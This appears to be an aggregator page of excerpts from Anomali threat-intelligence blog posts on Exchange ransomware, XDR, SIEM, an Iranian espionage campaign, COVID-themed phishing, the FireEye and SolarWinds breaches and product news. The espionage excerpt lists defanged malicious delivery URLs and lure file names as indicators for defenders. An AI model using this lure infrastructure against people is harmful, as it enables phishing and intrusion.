A new ransomware strain is being used by actors to attack unpatched Microsoft Exchange servers. Microsoft released patches for four vulnerabilities that are being exploited in the wild. The initial round of attacks included installation of web shells onto affected servers that could be used to infect additional computers. While the initial attack appears to have been done by sophisticated actors, the ease and publicity around these vulnerabilities has led to a diverse group of actors all attempting to compromise these servers.
Analyst Comment: Patch and asset management are a critical and often under-resourced aspect of defense in depth. As this particular set of vulnerabilities and attacks are against locally hosted Exchange servers, organization may want to assess whether a hosted solution may make sense from a risk standpoint
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted - T1022 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] System Service Discovery - T1007 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | |
Ransomware Tool Vulnerability Threat Guideline | Wannacry APT 41 APT 34 | |
|
2021-03-16 15:07:00 | An Intelligence-Driven Approach to Extended Detection and Response (XDR) (lien direct) | Threat detection isn’t getting any easier. Today’s threat actors are escalating the number of attacks they launch, going after more targets, using increasingly sophisticated techniques, and achieving their goals through surreptitiousness – not notoriety. With more than 2,000 security vendors catalogued and organizations reporting an average of 45 security solutions deployed, why aren’t we any closer to solving the threat detection gap? To answer this question, we first need to ask, what are we trying to achieve? For years now, we have known that the “whack-a-mole” approach of detecting discrete threats is at best a stopgap for the next inevitable attack. At a high level, most would likely agree that the always-shifting nature of adversaries, emergence of new vulnerabilities and exploits, and the all-menacing “zero day” leads to the continued proliferation of incidents ranging across data breaches, ransomware, and cyberespionage, etc. As soon as we close one door to attackers, they find and open another. This has always been the case. There’s more to this though. We think some of the answer can be found in the failure to fully optimize and connect existing tools, processes, and people to give them broader visibility over traffic and threats moving in and out of their networks while seamlessly layering in detection and response capabilities. As we were told in a recent discussion with an industry analyst, “We’ve reached an inflection point.” Enterprises know that the resources needed to greatly improve their security operations exist, they are now hungry to start using them to their maximum potential.” In other words, “We know the goods are available, how do we start using them to better find and neutralize the bad actors?” Enter Extended Detection and Response (XDR) You may have noticed lately that XDR is white hot in the security world. Scores of vendors are entering the fray — ranging across small startups to established 800-pound gorillas. Dozens of industry analysts are quickly validating XDR as more than just a buzzword, with Garter adding XDR to the “innovation trigger” on the newly created Security Operations Hype Cycle. As a long-time member of the security technology community, I can add that while we have certainly seen enthusiasm for trends at different periods, the level that XDR is generating reminds me of three other significant movements that changed the course of computing and security. The first was for Security Event and Information Management (SIEM), which I experienced during my time as a founder at ArcSight. The second was during the “big data” era. The third was for “cloud,” which in many ways has been reinvigorated due to COVID. XDR: What is it? Multiple definitions exist. We think of XDR as an architecture and in terms of how enterprises can leverage it to maximize the performance of their overall security investment (people, technologies, services) to take action against threats at the fastest possible speed. As leaders in the threat intelligence market and with deference to the essential role that global threat intelligence plays in accelerating detection and response, we offer up the following working definition: Organizations that run on top of XDR architectures are able to move closer to managing their security infrastructure as an integrated, unified platform. With XDR, Security Operations Centers (SOCs) can break silos to converge all security data and telemetry collected and generated by security technologies they’ve deployed (tech that includes firewalls, EDR, CASB, SIEM, SOAR, TIP etc.). With this information, they can generate strategic threat intelligence that empowers | Vulnerability Threat Patching Guideline | ||
|
2021-02-22 21:21:00 | An Intelligent, New Approach to Old Cybersecurity Challenges (lien direct) | How to Optimize SIEM Performance With Threat Intelligence and IOC Matching The nature of information technology is such that it is always expanding and being innovated at a pace that can be daunting to keep up with. The cybersecurity market in particular is constantly updating itself with the development of new technologies, methodologies, and best practices to deal with equally evolving cyberthreats. The security challenges faced by enterprise clients, however, have changed very little over the past couple of decades. They still want better visibility into the threats targeting them, they still struggle with data overload, and they still suffer from a shortage of human resources. The question is, why do these challenges still exist despite the progress we’ve made in establishing security standards and building better technologies? Challenge 1: Integration By taking a closer look at the cybersecurity deployments amongst large corporations, I have spotted some trends that lead to these challenges. Most of the enterprise clients I assist have many different security products in their environment. They address different use cases but are rarely cross-integrated. You could call these clients’ infrastructures ‘heterogenous’, given how the technologies and staff using them are effectively siloed. These silos slow down cross-communication, hinder response attack times, and leave legacy systems overlooked and often under-utilized. Challenge 2: Data Overload, Staffing Shortfall The advent of SIEM1 technology in the early 2000s has been a positive game changer for the cybersecurity industry. It also put a glaring spotlight on security challenges. When properly configured and manned, SIEMs keep users aware of all kinds of malicious activity occurring within their networks. However, ever-expanding IT environments mean ever-expanding log volumes, which require more storage space, more processing power, and more analysts to triage the high number of alerts that SIEMs generate every day. Why more analysts? Because a classic SOC model has Tier 1 analysts who triage alerts, Tier 2 analysts who perform incident response and remediation, and Tier 3 analysts running forensics and pentesting2… And a fair share of these tasks are performed manually! Challenge 3: Technology Advances Faster than We Can Hire In the last decade, the democratization of cyber threat intelligence has added an extra strain on SIEMs as clients want to use them to compare external threat data to internal logs. In terms of order of magnitude, we’re talking about comparing tens, if not hundreds of millions of indicators of compromise (IOCs) to billions, if not trillions of events in a SIEM in real-time. Though it’s possible in theory, it’s nowhere near efficient in practice—try querying your SIEM if a small list of just 1,000 Command & Control IP addresses were contacted by your assets in the past year and then tell me how many hours that search will take. The flood of data combined with staff restraints leaves organizations at a disadvantage, despite the advancements SIEMs continue to make. Meeting the Challenges, Supercharging the SIEM SIEMs aren’t going anywhere, and they shouldn’t — they’ve proven their value. When it comes to optimizing their capabilities, threat intelligence can make a major difference. For example, filtering a subset (fraction) of the total number of IOCs that are linked to threats most likely to target a company, and then comparing that data to the most recent SIEM event logs (e.g., last 90 days), enables more effective detection. However, a limited query such as this does not cover threat actors’ typical dwell time, and by omitting the majority of the IOCs from the query, its effectiveness is lessened. So now that we have a better understanding of why enterprise clients are still struggling with the challenges of threat visibility, data overload | Threat Guideline | ||
|
2021-02-10 16:34:00 | Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies (lien direct) | ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs Authored by: Gage Mele, Winston Marydasan, and Yury Polozov Key Findings Anomali Threat Research identified a campaign targeting government agencies in the United Arab Emirates (UAE) and likely the broader Middle East. We assess that Iran-nexus cyberespionage group Static Kitten, due to Israeli geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and the use of file-storage service Onehub that was attributed to their previous campaign known as Operation Quicksand.[1] The objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties. Malicious executables and URLs used in this campaign are masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw). Another sample, including only MOFA (mfa.gov), could be used for broader government targeting. Overview Anomali Threat Research has uncovered malicious activity very likely attributed to the Iran-nexus cyberespionage group, Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous sectors primarily located in the Middle East.[2] This new campaign, which uses tactics, techniques, and procedures (TTPs) consistent with previous Static Kitten activity, uses ScreenConnect launch parameters designed to target any MOFA with mfa[.]gov as part of the custom field. We found samples specifically masquerading as the Kuwaiti government and the UAE National Council respectively, based on references in the malicious samples. In mid-2020, the UAE and Israel began the process of normalizing relations. Since then, tensions have further escalated in the region, as reported by numerous sources. The targeting of Kuwait could be tied to multiple factors, including Kuwait’s MOFA making a public statement that they were willing to lead mediation between Iran and Saudi Arabia.[3] Furthermore, in October 2020, trade numbers for a peace deal between Israel and UAE included an estimate for the creation of 15,000 jobs and $2 billion in revenue on each side.[4] In that same month, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and included the use of file-storage service OneHub.[5] Details We identified two lure ZIP files being used by Static Kitten designed to trick users into downloading a purported report on relations between Arab countries and Israel, or a file relating to scholarships. The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat Research has identified that Static Kitten is continuing to use Onehub to host a file containing ScreenConnect. The delivery URLs found to be part of this campaign are: ws.onehub[.]com/files/7w1372el ws.onehub[.]com/files/94otjyvd File names in this campaign include: تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe الدرا | Ransomware Malware Tool Threat Studies Guideline | ||
|
2021-02-02 23:04:00 | Threat Actors Capitalize on COVID-19 Vaccine News to Run Campaigns, AWS Abused to Host Malicious PDFs (lien direct) | Key Findings
Malicious actors have targeted the vaccine supply chain and leaked materials stolen from the European Medicines Agency (EMA).
Phishing campaigns have evolved alongside the pandemic, with the latest observed themes being vaccine-related topics.
Users should remain cautious of possible phishing attacks via email, text messages (SMS), or just click through search results.
Overview
Threat actors change and adapt their campaigns to mirror themes prevalent in the public eye. When they leverage high-urgency trends, their success levels rise. Since the beginning of the pandemic, Anomali has focused resources to detect malicious cyber campaigns using COVID-19 themes. In this blog, Anomali Threat Research presents several malicious samples that represent simple tactics, techniques, and procedures (TTPs) used by actors in COVID-themed malspam campaigns. Less-sophisticated threat actors can be easier to monitor and block if the TTPs utilized by the actors are well known.
New Discoveries
The majority of this research centers on analysis of known threat actors and indicators of compromise (IOCs). There are several samples that we believe are newly discovered by our researchers (we haven’t seen them discussed elsewhere). Among these are several malicious PDFs hosted on Amazon Web Services (AWS) and other hosting websites. We discuss this campaign below in the chapter named “2.c. Alternative channel: Online PDF Search Engine Optimization (SEO)”, detailing samples with titles “Adenovirus vector pdf” and “Illinois coronavirus october 15”.
Details
1. Targeted Supply Chain Attacks
On December 28, 2020, the US Treasury Department's Financial Crimes Enforcement Network (FinCEN) published a notice entitled, “COVID-19 Vaccine-Related Scams and Cyberattacks.” That report provided evidence of actors conducting scams asking for a fee to provide potential victims with the vaccine sooner than permitted. Furthermore, FinCEN assessed that cybercriminals will likely continue to exploit the COVID-19 pandemic to target financial institutions, vaccine delivery operations, and vaccine manufacture supply chains. FinCEN is aware of ransomware directly targeting vaccine research and has pushed for awareness of these phishing schemes luring victims with fraudulent information about COVID-19 vaccines.[1]
Other threats to vaccine research have been reported by US and European intelligence agencies. In December 2020, threat actors breached the European Medicines Agency (EMA) whilst it was in the COVID-19 vaccine evaluation process. On January 12, 2021, threat actors leaked a portion of the stolen materials with regards to Pfizer/BioNTech vaccine (Figure 1).[2] On the same day in an unrelated event, the Director of the National Counterintelligence and Security Center (NCSC), William Evanina, confirmed the existence of threats from China and Russia to disrupt the US coronavirus vaccine supply chain.[3]
Figure 1 – Screenshot of the Files in the EMA Vaccine Breach
The publication of the EMA vaccine breach on RaidForums was taken down by forum administrators only to resurface on other platforms. Later, the EMA claimed that at least some of the leaked correspondence had “been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines.”[4]
2. Non-targeted Adoption by Phishing Campaigns
Below are three examples of COVID-19 vaccine-related phishing campaigns utilizing different delivery methods: email, SMS, and search engine traffic. As COVID-19 vaccination is a newsworthy topic, it would be consistent with observed activity for so |
Ransomware Spam Malware Threat Guideline | ||
|
2020-12-17 18:00:00 | FireEye, SolarWinds Hacks Show that Detection is Key to Solid Defense (lien direct) | Several years back, industry analyst firm Gartner began circulating the idea that almost every major enterprise and government agency was either compromised or would be compromised at some point in time. This week, when we woke up to the news that FireEye and SolarWinds had joined the ranks of the hacked, we learned once again that Gartner was right. Even companies with advanced security expertise and expansive resources can’t escape this inevitable fact of digital life.
Forensic experts and news outlets are now following the trail of digital clues, trying to make sense of how both companies ended up on the hacked side of the equation. At a high level, we know that FireEye was compromised by a state-sponsored adversary. In the case of SolarWinds, it is looking like an adversary was able to dwell in victims’ networks for as long as nine months and that the prime suspect is the Kremlin.
There are undoubtedly many organizations wondering if they are caught up in the attacks, either by design or indirectly. Fortunately, those that have effective threat detection capabilities in place can utilize the information FireEye, SolarWinds, Anomali and other threat research organizations are providing to determine if they’ve been hit.
Anomali customers are already ahead of the game. As soon as the world becomes aware of an attack, Anomali Threat Research immediately front-loads Anomali ThreatStream with a threat bulletin that provides a detailed and concise narrative of the situation along with a comprehensive list of the known indicators of compromise (IOCs). Once added, information relevant to the incident (IOCs, reports from the security community, signatures, etc.) are automatically delivered to customers. This gives them the ability to automate threat detection and blocking across their security controls, including EDR, firewalls, and SIEM. In addition, customers using Anomali Match, our threat detection and response product, are able to use the threat intelligence to do a retrospective search back to when the threat was active, getting real-time results showing whether the threat was seen in their network at that time.
To provide threat intelligence and security operations analysts with a look at what an Anomali threat bulletin looks like, we’ve added the first version of the FireEye threat bulletin to this blog. We are happy to discuss more deeply how Anomali customers are using this information and continual updates to detect the presence of related IOCs in their environments. Reach us at general@anomali.com.
To listen to a more in-depth conversation on the incident and how threat intelligence aids in detection, listen to this week’s Anomali Detect Podcast.
Key Findings
Unknown, sophisticated actors stole more than 300 FireEye Red Team tools and countermeasures (signatures) on an unspecified date.
An unnamed source for The Washington Post claimed Cozy Bear (APT29), is responsible, but provided no evidence.
Actor(s) were also interested in FireEye customers, specifically, government entities.
The Red Team countermeasures consisted of custom-versions of known tools, a prioritized Common Vulnerabilities and Exposures (CVE) list, and malware signatures in ClamAV, HXIOC, Snort, and Yara languages.
The stolen tools could be customized by actors, just as the FireEye Red Team did to existing tools.
|
Malware Threat Guideline | APT 29 | |
|
2020-12-17 15:00:00 | Anomali December Release: The Need for Speed (lien direct) | We are happy to announce the Anomali Quarterly Release for December 2020. For our product and engineering teams to deliver this latest set of features and enhancements, they worked closely with our customers with a particular eye to further improving the speed of threat intelligence operations. As organizations mature in their threat intelligence programs and seek to leverage ever-larger quantities of threat intelligence inputs and security telemetry data, the need for capabilities that enhance the efficiency of threat intelligence and SOC analysts becomes paramount. So we worked (and will continue to work) to reduce friction in the moment-to-moment workday of our users and add velocity to overall workflows in a way that improves their organizations’ overall security posture. Examples of enhancements in this latest release include:
Pre-Built Themed Dashboards
The addition of pre-customized, themed dashboards allow analysts to quickly focus on new and relevant intelligence investigations about specific events impacting their organizations. Anomali Threat Research analysts applied their expertise to aid in the design and development of these dashboards for real-world investigation scenarios. Now available via the Anomali ThreatStream threat intelligence platform (TIP), new dashboard themes include COVID-19 indicators of compromise (IOC’s), relevant global cyberthreat activities, and a view to vulnerabilities and exploits that adversaries are using to compromise your systems and data.
Figure 1 - Example Covid-19 IOCs focused dashboard
Figure 2 - Example Global Threat Activity dashboard
Flexible MITRE ATT&CK Framework Coverage — With this new capability, threat intelligence analysts can configure their security coverage levels for each technique in the framework. This allows them to align their work more precisely with targeted organizational security response strategies, which removes friction and increases the speed of overall workflows.
Figure 3 - Analysts can tune security coverage for each Mitre Attack technique
Faster Investigations
To continue making threat analysts’ lives easier and more productive, we’ve added a Threat Card feature that allows users to gain deeper insights into threats without having to navigate to additional pages, and have also improved collaboration in active investigations by introducing visibility and access controls. Analysts will be able to mark their Investigations until completed as “Private,” and optionally increase the visibility to their workgroups or their organization. While users are editing their Investigation, it can be locked so that other team members do not duplicate efforts. Threat analysts also now have greater control over the UI via added mouse functionality, the type of utility that helps them move more quickly through an investigation.
Figure 4 - Active investigations benefit from Threat Cards and privacy controls
Faster Finished Intelligence
Anomali ThreatStream now offers multiple default templates for the creation of finished intelligence products, giving analysts the ability to apply their organizations’ branding to reports and then distribute them directly from ThreatStream to all relevant stakeholders. This added feature gives analysts a more simplified, intuitive and faster way to format and distribute insights and findings they’ve developed.
 |
Tool Threat Guideline | ||
|
2020-10-01 22:15:00 | Cybersecurity Awareness Month Starts Today, #BECYBERSMART (lien direct) | Welcome to National Cybersecurity Awareness Month (NCSAM)! The meaning of the month has been obscured from its original purpose, somewhat, due to it having been hijacked by marketing and PR teams. It is worth pointing out that it remains a worthy cause. NCSAM is a collaboration between the United States Cybersecurity and Infrastructure Agency (CISA) and National Cyber Security Alliance (NCSA). It is designed to influence government, business, and consumers to consider the cybersecurity implications that are inherent in their connected activities and lives. This year’s theme is “Do Your Part. #BECYBERSMART.” “This theme encourages individuals and organizations to own their role in protecting their part of cyberspace, stressing personal accountability and the importance of taking proactive steps to enhance cybersecurity,” according to CISA and the NCSA. At Anomali, the purpose of NCSAM is, of course, our daily focus. We constantly deliver on customer-centric product improvements. We provide the security community with gratis threat research and analysis used broadly to reduce risk. We strive to ensure that public and private sector organizations can leverage intelligence that helps them to know and detect their adversaries. Over the past several months, we have accomplished many achievements we believe are worth noting in light of the month. By naming these, are we guilty of doing a bit of hijacking ourselves? Yes. However, some of what’s listed are also critical security resources available to any organization that is interested in reducing its risk to cyberattacks and learning more about how it can operationalize intelligence. Here’s a look at our record since March: October 1 – The State of Oklahoma’s Office of Management and Enterprise Services (OMES) activated its new Information Sharing and Analysis Center (ISAC). Powered by Anomali ThreatStream Community Edition, it’s providing the state’s government and corporate-partner entities with immediate access to intelligence about the most serious threats targeting their operations. All agencies are under constant assault from massive waves of cyberattacks that impact citizens, police departments, municipalities, election precincts, and remote workers. With the ability to share information about adversaries, essential state services can reduce their risk of falling victim to disruptive and costly attackers. September 24 – With threat intelligence now recognized as critical to security and risk, global analyst firm Frost & Sullivan produced the Frost Radar: Global Threat Intelligence Platform Market, 2020, a report highlighting eight key players in the market as well as its overall size. Anomali was recognized as the leader, with 40 percent market share and as such, named the Frost Radar: 2020 Innovation Excellence Award winner in the space. September 21 –Anomali was recognized as part of the Gartner Market Guide for Security Orchestration, Automation and Response Solutions (SOAR). SOAR is described as a market made up of solutions that combine incident response, orchestration, and automation, and threat intelligence (TI) management capabilities in a single platform. Anomali ThreatStream, our leading Threat Intelligence Platform (TIP) solution, was recognized for its recently added SOAR capabilities. August 25 – With an ear wide open to customers, our product team delivered on the next phase of what’s needed in the market. With our | Malware Threat Guideline | ★★★★★ | |
|
2020-09-22 15:00:00 | Weekly Threat Briefing: Android Malware, APT Groups, Election Apps, Ransomware and More (lien direct) |
The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Cerberus Source Code Leak, Chinese APT, Mrbminer Malware, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
US 2020 Presidential Apps Riddled with Tracking and Security Flaws
(published: September 17, 2020)
The Vote Joe 2020 application has been found to be potentially leaking personal data about voters. The app is used by the Joe Biden campaign to engage with voters and get supporters to send out promotional text messages. Using TargetSmart, an intelligence service, the app receives their predictions via API endpoint which has been found to be returning additional data. Voter preference and voter prediction could be seen, while voter preference is publically accessible, the information for TargetSmart was not meant to be publicly available. The app also let users from outside of the United States download, allowing for non-US citizens to have access to the data, as there was no email verification. Vote Joe isn’t the only campaign app with security issues, as the Donald Trump application exposed hardcoded secret keys in the APK.
Recommendation: The exposure of Personally Identifiable Information (PII) requires affected individuals to take precautionary measures to protect their identity and their finances. Identity theft services can assist in preventing illicit purchases, or applying for financial services from taking place by actors using stolen data.
Tags: APK, Android, Campaign, Election, Joe Biden, PII
German Hospital Attacked, Patient Taken to Another City Dies
(published: September 17, 2020)
A failure in IT systems at Duesseldorf University Hospital in Germany has led to the death of a woman. In an apparent ransomware attack, the hospital’s systems crashed with staff unable to access data. While there was no apparent ransom note, 30 servers at the hospital had been encrypted last week, with a ransom note left on one server addressed to Heinrich Heine University. Duesseldorf police contacted the perpetrators to inform them they had attacked the hospital instead of the university, with the perpetrators providing decryption keys, however patients had to be rerouted to other hospitals and therefore a long time before being treated by doctors.
Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Germany, Healthcare, Hospital, Ransomware
|
Ransomware Malware Vulnerability Threat Patching Guideline | APT 41 | ★★★★★ |
To see everything:
Our RSS (filtrered)
